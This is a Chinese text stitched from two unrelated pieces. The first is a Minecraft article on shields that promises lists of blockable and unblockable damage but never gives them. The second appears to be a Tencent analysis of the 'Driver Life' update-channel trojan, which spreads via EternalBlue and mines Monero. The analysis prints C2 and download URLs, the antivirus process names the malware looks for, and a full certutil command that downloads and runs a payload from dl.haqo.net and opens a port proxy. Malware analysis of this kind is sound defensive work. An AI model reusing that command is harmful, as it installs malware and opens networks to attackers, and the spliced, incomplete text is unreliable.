牌(Shield) 是一種用來抵擋傷害的防御工具。 《我的世界》僅JAVA版可用,使用盾牌時,玩家的速度會非常慢,近乎于潛行。但它的防御能力,卻是你無法忽視的!
Minecraft盾牌的5個冷知識!能擋住9種攻擊,卻擋不住這3種傷害!我的世界:MC“盾牌”能擋住9種攻擊,卻擋不住這3種致命傷害!
《我的世界》早些年是沒有“盾”這件物品的,而早期Minecraft的劍是有格擋能力的。盾的加入直接取代了劍的格擋能力。手機版MC直接是沒有盾牌的,因為手機的可操作性問題一直未被解決。
盾牌的保護范圍極大,所以被稱為《我的世界》萌新生存“神器”。至少你比想象的要大的多,因為它能防御不僅僅盾牌大小的區域,幾乎涵蓋了史蒂夫的正前方。
范圍:史蒂夫正面180度的范圍幾乎都在盾牌的防御之中,但純側面的攻擊無法防御。所以準確來說,應該是史蒂夫正面的178度范圍,全在盾牌的防御下。
《我的世界》盾牌究竟能擋住哪些攻擊呢?其實總結一下,但凡有實體性質的攻擊,都會被盾牌給格擋下來。包括武器的接觸,怪物肢體的接觸等等合計9種類型的攻擊。
說了那么多盾牌可以抵擋的攻擊,那么盾牌擋不住哪些傷害呢?要知道《我的世界》盾牌并不是萬能的,否則生存豈不是可以無敵了。而這三種類型的致命傷害,卻是它無法抵擋的。
你一定沒想到,《我的世界》盾牌也是可以附魔的。只可惜Minecraft對現在的盾牌開放的附魔太少,只有“耐久、經驗修補、消失詛咒”三種附魔。
想象一下如果盾牌可以附魔“荊棘”,防御的同時帶來傷害,或者火焰附加,防御同時附帶火焰傷害。等等附魔特性,盾牌會不會更加強大呢?
我們設想一下:如果在《我的世界》中,史蒂夫從高處跌落,臉先著地的,恰好在盾牌的防御范圍內。此時盾牌能防御住跌落傷害么?
騰訊安全御見威脅情報中心監測發現,一款通過“驅動人生”升級通道,并同時利用“永恒之藍”高危漏洞傳播的木馬突然爆發,僅2個小時受攻擊用戶就高達10萬。“驅動人生”木馬會利用高危漏洞在企業內網呈蠕蟲式傳播,并進一步下載云控木馬,在中毒電腦進行門羅幣挖礦。
12月14日下午,騰訊安全御見威脅情報中心監測發現,一款通過“驅動人生”升級通道,并同時利用“永恒之藍”高危漏洞傳播的木馬突然爆發,僅2個小時受攻擊用戶就高達10萬。
“驅動人生”木馬會利用高危漏洞在企業內網呈蠕蟲式傳播,并進一步下載云控木馬,在中毒電腦上進行門羅幣挖礦。云控木馬對企業信息安全威脅巨大,企業用戶須重點關注。
該病毒爆發剛好是周末時間,令企業網管猝不及防,周一工作日員工電腦開機后,建議立刻查殺病毒,再使用殺毒軟件的漏洞修復功能安裝系統補丁。個人電腦用戶使用騰訊電腦管家即可防御。
本次病毒爆發有三個特點:
1.驅動人生升級通道傳播的病毒會在中毒電腦安裝云控木馬;
2.病毒會利用永恒之藍漏洞在局域網內主動擴散;
3.通過云端控制收集中毒電腦部分信息,接受云端指令在中毒電腦進行門羅幣挖礦。
木馬攻擊流程圖
dtlupg.exe訪問以下url下載病毒
hxxp://xxxx.update.ackng.com/ziptool/pullexecute/f79cb9d2893b254cc75dfb7f3e454a69.exe
hxxp://xxxx.update.ackng.com/calendar/pullexecute/f79cb9d2893b254cc75dfb7f3e454a69.exe
(注意,為避免網友點擊以上鏈接可以直接下載病毒程序,對部分字符做了隱藏處理)
病毒文件釋放在:
C:\Program Files (x86)\DTLSoft\rili\Updater\ctrlf\f79cb9d2893b254cc75dfb7f3e454a69.exe等位置執行。
f79cb9d2893b254cc75dfb7f3e454a69.exe 運行后最終釋放出 C:\WINDOWS\Temp\svvhost.exe
(MD5:2E9710A4B9CBA3CD11E977AF87570E3B)運行,svvhost.exe打包了“永恒之藍”等漏洞攻擊工具在內外網進一步擴散。
2.1 病毒母體
F79CB9D2893B254CC75DFB7F3E454A69.exe
運行后將自身拷貝到C:\windows\system32\svhost.exe,安裝為服務并啟動,服務名為Ddiver,并在隨后拉起云控模塊svhhost.exe、攻擊模塊svvhost.exe。
運行時先檢測互斥體,確定是否已感染過。
通過檢測以下進程將殺軟信息搜集準備上傳。
360tray.exe|360sd.exe|avp.exe|KvMonXP.exe|RavMonD.exe|Mcshield.exe|egui.exe|kxetray.exe|knsdtray.exe|TMBMSRV.exe|avcenter.exe|ashDisp.exe|rtvscan.exe|ksafe.exe|QQPCRTP.exe
檢測到任務管理器及游戲進程則將云控模塊svhhost.exe退出。
打開互斥體,對象名稱為"I am tHe xmr reporter" ,xmr意指xmrig.exe礦機。
搜集系統敏感信息上傳到hxxp://i.haqo.net/i.png,并接受返回的云控代碼等待執行。
母體設置進程共享內存HSKALWOEDJSLALQEOD
2.2 挖礦
云控木馬svhhost.exe其主要功能是,從母體進程svhost.exe共享內存中讀取shellcode解密并執行,每隔2000秒讀取一次共享內存中的shellcode進行解密執行,共享內存名為HSKALWOEDJSLALQEOD,目前該shellcode主要功能挖礦,不排除后期會拉取其他更加惡意如加密勒索等木馬病毒執行
云控木馬執行流程
云控木馬運行后會創建一個線程,該線程函數主要功能是判斷進程svhost.exe(母體進程)是否存在,不存在的話則啟動該進程,接下來要讀取的共享內存數據就是從該進程進行讀取
創建線程判斷母體進程是否存在
調用OpenFileMappingA打開共享內存,讀取共享內存數據
讀取共享內存數據
調用RtlDecompressBuffer函數解壓共享內存中的數據,為下一步執行做準備
解壓共享內存數據
共享內存數據加壓完后會執行,目前該shellcode主要功能挖礦,不排除后期會拉取其他更加惡意如加密勒索等木馬病毒執行
執行shellcode
嘗試挖礦時通信IP為172.105.204.237
2.3 攻擊模塊
攻擊模塊從地址hxxp://dl.haqo.net/eb.exez下載,作為子進程Svvhost.Exe啟動,分析發現該文件是通過python實現的“永恒之藍”漏洞利用模塊壓縮打包程序。
子進程Svvhost.Exe為將python實現的“永恒之藍”漏洞利用模塊壓縮打包程序。
Mysmb.pyo為攻擊時掃描代碼。
GitHub上也可以看到相關開源代碼
掃描內網445端口進行攻擊
不僅攻擊內網漏洞機器,還隨機找幾個外網IP嘗試攻擊,1次攻擊完后沉默20分鐘
攻擊成功后paylaod在中招機器執行以下命令進行內網擴散傳播
cmd.exe /c certutil -urlcache -split -f http://dl.haqo.net/dl.exe c:/install.exe&c:/install.exe&netsh firewall add portopening tcp 65531 DNS&netsh interface portproxy add v4tov4 listenport=65531 connectaddress=1.1.1.1 connectport=53
1. 服務器暫時關閉不必要的端口(如135、139、445),方法可參考:https://guanjia.qq.com/web_clinic/s8/585.html
2. 企業用戶在周一上班后,建議使用騰訊御點查殺病毒(個人用戶可使用騰訊電腦管家),然后使用漏洞修復功能,修復全網終端存在的系統高危漏洞;
3. 服務器使用高強度密碼,切勿使用弱口令,防止黑客暴力破解;
4. 使用殺毒軟件攔截可能的病毒攻擊;
5. 推薦企業用戶部署騰訊御界高級威脅檢測系統防御可能的黑客攻擊。御界高級威脅檢測系統,是基于騰訊反病毒實驗室的安全能力、依托騰訊在云和端的海量數據,研發出的獨特威脅情報和惡意檢測模型系統。